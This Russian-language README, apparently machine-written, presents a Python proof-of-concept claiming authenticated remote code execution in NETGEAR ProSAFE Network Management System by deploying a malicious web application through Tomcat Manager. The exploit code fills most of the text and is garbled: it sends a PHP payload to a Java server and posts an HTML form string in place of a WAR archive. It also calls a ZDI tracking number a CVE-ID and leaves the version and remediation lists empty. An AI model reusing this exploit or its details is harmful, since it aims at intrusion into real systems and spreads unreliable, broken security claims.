
Proof-of-concept Python-скрипт, демонстрирующий аутентифицированное удалённое выполнение кода в NETGEAR ProSAFE Network Management System через уязвимый Apache Tomcat путём развёртывания вредоносного веб-приложения.
Вот структурированный README.md для Proof of Concept (PoC) уязвимости удаленного выполнения кода (RCE) в NETGEAR ProSAFE Network Management System:
Этот репозиторий содержит скрипт Proof of Concept (PoC), демонстрирующий уязвимость удаленного выполнения кода (RCE) в NETGEAR ProSAFE Network Management System. Уязвимость связана с использованием уязвимой версии Apache Tomcat в составе установщика продукта. Данная проблема позволяет аутентифицированным злоумышленникам выполнять произвольный код на затронутых установках.
CVE-ID: ZDI-CAN-22868
Обзор: NETGEAR ProSAFE Network Management System содержит уязвимость удаленного выполнения кода из-за использования уязвимой версии Apache Tomcat. Атакующий, имеющий аутентификацию, может использовать эту уязвимость для выполнения произвольного кода на затронутой системе в контексте SYSTEM.
Затронутые версии:
Аутентификация: Требуется
Данный PoC демонстрирует, как злоумышленник может использовать уязвимость для достижения удаленного выполнения кода. Конкретная ошибка заключается в установщике продукта из-за использования устаревшей или уязвимой версии Apache Tomcat.
Следующий скрипт иллюстрирует, как использовать эту уязвимость RCE. Убедитесь, что у вас есть соответствующие разрешения перед запуском этого PoC.
Важно: Этот PoC предназначен только для образовательных целей и не должен использоваться для несанкционированных или вредоносных действий.
import requests
# Configuration
target_url = "http://target-ip:port/manager/html" # Change this to the Tomcat Manager URL of the target
username = "admin" # Change to the valid username
password = "password" # Change to the valid password
# The payload to be executed on the remote server
payload = """
<?php
// Payload to execute arbitrary PHP code
system('whoami');
?>
"""
# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"
# Headers for authentication
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
def exploit_rce(url, username, password, payload):
"""
Exploit the RCE vulnerability by deploying a malicious web application.
Args:
url (str): The Tomcat Manager URL.
username (str): The Tomcat Manager username.
password (str): The Tomcat Manager password.
payload (str): The malicious payload to be executed.
"""
try:
# Create a new web application with the malicious payload
response = requests.post(
url,
headers=headers,
data={
"path": "/example",
"war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
},
auth=(username, password)
)
# Print the response details
print("Status Code:", response.status_code)
print("Response Body:", response.text)
if response.status_code == 200 and "Deployed application" in response.text:
print("[+] Successfully deployed the malicious web application.")
else:
print("[-] Failed to deploy the malicious web application.")
except requests.RequestException as e:
print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
print(f"Exploiting RCE vulnerability at: {deploy_url}")
exploit_rce(deploy_url, username, password, payload)
target_url на URL Tomcat Manager целевой системы, и обновите username и password действительными учетными данными.exploit_rce() отправляет POST-запрос для развертывания вредоносного веб-приложения.Для устранения этой уязвимости выполните следующие шаги:
Выполнив эти шаги, вы сможете устранить уязвимость RCE в NETGEAR ProSAFE Network Management System и повысить общую безопасность.
Этот README.md предоставляет подробное описание и скрипт PoC для уязвимости RCE, включая инструкции по настройке, соображения и рекомендации по устранению.